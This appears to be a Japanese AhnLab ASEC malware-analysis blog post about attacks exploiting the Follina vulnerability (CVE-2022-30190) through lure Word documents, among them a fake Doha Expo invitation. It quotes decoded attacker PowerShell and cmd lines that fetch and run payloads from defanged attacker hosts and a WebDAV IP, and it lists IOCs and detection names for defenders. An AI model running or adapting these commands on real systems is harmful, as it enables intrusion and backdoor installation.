5月31日、ASEC 分析チームは本ブログで MS Office のドキュメントファイルのゼロデイ脆弱性である Follina について迅速に取り上げて紹介した。この脆弱性についてのパッチはまだ配布されていないため、ユーザーは以降も注意しなければいけない状況である。
AhnLab はこの脆弱性を利用した攻撃の試みに対するファイル検知、行為検知の観点から、検知ルールを配布した状態である。そのため、様々な当社の製品群(V3、MDS、EDR)で検知が可能である。このような攻撃の試みに対するモニタリングを行っていたところ、6月7日に韓国国内のユーザーをターゲットとした拡散状況が、当社 ASD(Ahnlab Smart Defence)インフラを通して確認された。V3 Lite 4.0 製品を使用しているユーザーであり、「抗菌フィルム提案書 1-1.docx」という名前で拡散していることが分かっている。

当該ファイルは、すでに共有しているように msdt.exe を利用した遠隔プロセスによって実行され、Windows の正常なプログラムである Powershell.exe と CertUtil.exe を使い、暗号化されたスクリプトをダウンロードして復号化した後、再び Powershell.exe を使って、実行中の explorer.exe にインジェクションして不正な振る舞いを行う。詳しい実行内容は以下の通りである。

疑うことなく CVE-2022-30190 脆弱性が使われた「抗菌フィルム提案書 1-1.docx」という名前の Word ドキュメントを実行すると、上記の図のように遠隔コマンドが実行される。
// 上記の図における復号化されたコードの一部
"c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell iwr -outf %tmp%\api.txt http://micronannox[.]com//b.txt & certutil -decode %tmp%\api.txt %tmp%\apis.ps1";
Start-Sleep 3;
Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser & powershell %tmp%\apis.ps1
上記の脆弱性によって実行されたコードの実行順序を簡単に示すと以下のようになる。
- Powershell.exe は hxxp://micronannox[.]com/b.txt を %tmp%api.txt に保存する。
- api.txt を Certutil.exe を利用して apis.ps1 に復号化する。
- 隠し属性とスクリプト実行権限を与えて復号化した apis.ps1 を実行する。
- apis.ps1 の機能をシェルコードを実行している explorer.exe にインジェクションし、インジェクションされたシェルコードは追加で暗号化されたデータを hxxp://micronannox[.]com/imei.omg から C:\Users\Public\no1.png パスにダウンロードし、xor で復号化する。
- 最終的に復号化されたファイルは実行ファイルであり、追加でバックドアファイルをダウンロードする。

AhnLab のセキュリティ製品は、最新の脆弱性を持つドキュメントファイルについて、以下のように検知している。
AhnLab EDR 検知


この脆弱性と関連したファイルを検知するために反映したルールの検知ログにおいて、6月2日に「2023 DOHA EXPO」をターゲットにしたドキュメント(VIP Invitation to Doha Expo 2023.docx)が相次いで確認されたため、これについて紹介する。
Word ファイルの実行時、内部の document.xml.rels とつながっている External URL からデータのダウンロードを試みるが、この時にもユーザーを巧みに欺くためにダウンロード URL も「2023 DOHA EXPO」と関連したアドレスを利用することが分かっている。
- hxxps://files.attend-doha-expo[.]com/inv.html
以下の図7、図8のように、Word 本文の内容は DOHA EXPO の招待状に偽装している。


検知ログのモニタリング過程において、2つのWord ドキュメントが確認されたが、それぞれファイルの内部に document.xml.rels の External タグに存在する URL が同じであることから、タグ配置の構造上、若干の変化が加えられていることが確認された。
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
(..省略..)
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://files.attend-doha-expo[.]com/inv.html!" TargetMode="External" />
(..省略..)
</Relationships>
HTML ファイルは、すでに公開された PoC コードの形態と同じように、上段の内容は長いテキスト(AAA~)でコメントアウトされているが、下段は PowerShell コードが Base64 でエンコードされていることが確認でき、これをデコードすると以下のようになる。
前回の記事で、ms-msdt を通して攻撃者が意図したコードの実行が可能なため様々な攻撃ができると紹介したが、「2023 DOHA EXPO 招待状」に偽装した Word ドキュメントと関連した当該 HTML では、CobaltStrike のペイロードをダウンロードできるコードが存在していた。
[外部リンク参照]

$cmd="C:\windows\system32\cmd.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c net use z: \\5.206.224[.]233\webdav\ /user:user `$RFVbgtyuJ32D && z:\osdupdate.exe && net use z: /delete ";
公式パッチが配布されるまでは MSDT URL プロトコルを無効にするといった方法で一時的な処置が可能である。
AhnLab では以下のような検知名でこの脆弱性のファイルおよび行為の検知が可能である。
- ファイル検知名
Exploit/HTML.CVE-2022-30190.S1841
Exploit/XML.CVE-2022-30190.S1842
Exploit/DOC.CVE-2022-30190
Downloader/DOC.External - 行為検知名
Behavior/MDP.Event.M4313
[IOC]
hxxps://files.attend-doha-expo[.]com/inv.html
hxxp://micronannox[.]com/b.txt
hxxp://micronannox[.]com/imei.omg
hxxp://micronannox[.]com/slid.html
85829b792aa3a5768de66beacdb0a0ce
7c4ee39de1b67937a26c9bc1a7e5128b
4e7fc2acd66d87c7a439b49196899001
35a20a3ace9f59456a75f469186d2d19
963cc5bd71dc0412941bfc336100ec94
hxxp://5.206.224[.]233
hxxp://23.106.122[.]13
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報